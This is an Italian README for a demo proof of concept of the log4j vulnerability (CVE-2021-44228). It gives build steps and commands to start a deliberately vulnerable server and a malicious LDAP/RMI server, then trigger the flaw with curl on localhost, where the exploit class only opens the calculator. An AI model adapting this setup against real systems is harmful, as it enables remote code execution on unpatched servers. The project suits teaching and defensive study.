
progetto demo per mostrare come sfruttare la vulnerabilità log4j (CVE-2021-44228)
progetti demo per evidenziare come eseguire la vulnerabilità log4j (CVE-2021-44228)
usato spring boot solo per essere impostato velocemente. dovrete scusare tutto l'hard coding, era solo un POC.
Avere Java 8 installato. Compilare usando maven mvn clean package -DskipTests. Eseguire questi comandi in finestre di shell separate:
java -jar vulnerable-server/target/vulnerable-server.jar
java -jar malicious-server/target/malicious-server.jar
curl http://localhost:8880/victimLDAP
curl http://localhost:8880/victimRMI
Questo dovrebbe eseguire il codice nella classe Exploit (che aprirà semplicemente la calcolatrice)